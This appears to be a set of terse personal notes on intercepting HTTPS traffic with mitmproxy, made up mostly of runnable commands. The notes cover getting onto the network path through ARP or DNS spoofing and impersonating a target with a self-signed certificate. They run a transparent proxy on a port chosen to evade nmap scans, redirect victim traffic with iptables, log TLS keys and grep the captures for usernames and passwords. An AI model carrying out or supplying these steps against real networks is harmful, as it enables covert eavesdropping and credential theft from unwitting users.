first of all, you need to be on the network path, be it as an existing gateway, by means of dns or arp spoofing, what-so-ever. in any case, making sure you have the appropriate gateway and resolvers yourself so you can relay the traffic. on the client’s side, the right network path shows up but the first hop.
you can run mitmproxy as user on a local and exotic port, as long as you enable the interception.
there are two ways to go for ssl interception
either as package, from scratch or using latest released binaries
as package
#apt install mitmproxy #dpkg -l | grep mitm
from scratch
apt install python3 python3-venv #python3-pip git clone https://github.com/mitmproxy/mitmproxy.git cd mitmproxy/ ./dev.sh . venv/bin/activate mitmproxy --version
grab the latest release
as root
wget https://snapshots.mitmproxy.org/7.0.4/mitmproxy-7.0.4-linux.tar.gz mkdir -p mitm/ tar xzf mitmproxy-7.0.4-linux.tar.gz -C mitm/ ls -alF mitm/ chown root:root mitm/* mv mitm/* /usr/local/bin/ rmdir mitm/
as user
let’s have a look on what you need to impersonate
echo Q | openssl s_client -servername TARGET-VHOST -connect TARGET-HOST:443 \ | openssl x509 -noout -text
ideally you get a true cert but this makes a PoC
cd ~/certs/ openssl req -x509 -newkey rsa:2048 -nodes \ -subj /CN=DOMAIN \ -keyout DOMAIN.self.key \ -out DOMAIN.self.crt
mitmproxy wants CRT + KEY concatenated as PEM file
cat DOMAIN.self.crt DOMAIN.self.key > DOMAIN.self.pem chmod 400 *.crt *.key *pem
start the mitm service either with a TUI (this truly eats your memory) –or– in tcpdump-alike style (writes to a file)
echo $LANG #export LANG=en_US.UTF-8 mitmproxy --version mitmproxy -h | less mitmproxy --options | less mitmproxy -p 33231 \ --set block_global=false \ --mode transparent --showhost \ --set console_mouse=false ls -alF $HOME/.mitmproxy/
now sniffing ONLY example.net
and passing through the rest with no tainting.
same as above but with
--ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \ --certs example.net=example.net.self.pem # --ssl-insecure
mitmdump --version mitmdump -h | less mitmdump --options | less
don’t ask me why we need an absolute path there
mkdir -p /data/dumps/ date=`date +%s` export MITMPROXY_SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt" #SSLKEYLOGFILE= echo $date #echo $SSLKEYLOGFILE echo $MITMPROXY_SSLKEYLOGFILE mitmdump -p 33231 \ --set block_global=false \ --mode transparent --showhost \ --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \ --certs example.net=$HOME/certs/example.net.pem \ -w /data/dumps/$date.mitmdump --flow-detail 0
default port for mitmproxy is 8080
being used for both http or https.
we want a port that is not in nmap’s top 1000 to remain hidden.
sysctl -w net.ipv4.ip_forward=1 sysctl net.ipv4.ip_forward sysctl -w net.ipv4.conf.eth0.send_redirects=0 sysctl net.ipv4.conf.eth0.send_redirects nic=virbr0 iptables -t nat -A PREROUTING -i $nic -p tcp --dport 443 -j REDIRECT --to-port 33231 iptables -nvL -t nat
from the victim/client
curl -i https://example.net/ curl -ik https://example.net/
netstat -lntup cd /data/dumps/ grep -a UserName $date.mitmdump grep -a Password $date.mitmdump
enhance your filter offline
cd /data/dumps/ mitmdump -nr $date.mitmdump "~m get" mitmdump -nr $date.mitmdump "~m post"
Introduction https://docs.mitmproxy.org/stable/
Wireshark and SSL/TLS Master Secrets https://docs.mitmproxy.org/stable/howto-wireshark-tls/
Transparent Proxy https://docs.mitmproxy.org/stable/concepts-modes/#transparent-proxy
Transparent Proxying https://mitmproxy.readthedocs.io/en/v2.0.2/transparent.html
Mitmproxy Core Features https://docs.mitmproxy.org/stable/overview-features/
How To: Use mitmproxy to read and modify HTTPS traffic https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/
Ignoring Domains https://docs.mitmproxy.org/master/howto-ignoredomains/
Ignore Domains https://mitmproxy.readthedocs.io/en/v2.0.2/features/passthrough.html
Ignor regex exclude not working #3013 https://github.com/mitmproxy/mitmproxy/issues/3013
mitmdump https://mitmproxy.readthedocs.io/en/v2.0.2/mitmdump.html
Filter expressions https://mitmproxy.readthedocs.io/en/v2.0.2/features/filters.html
Top 1,000 TCP and UDP ports (nmap default) https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/
Port Selection Data and Strategies https://nmap.org/book/performance-port-selection.html
SecLists/Discovery/Infrastructure/nmap-top1000-ports.txt https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/nmap-top1000-ports.txt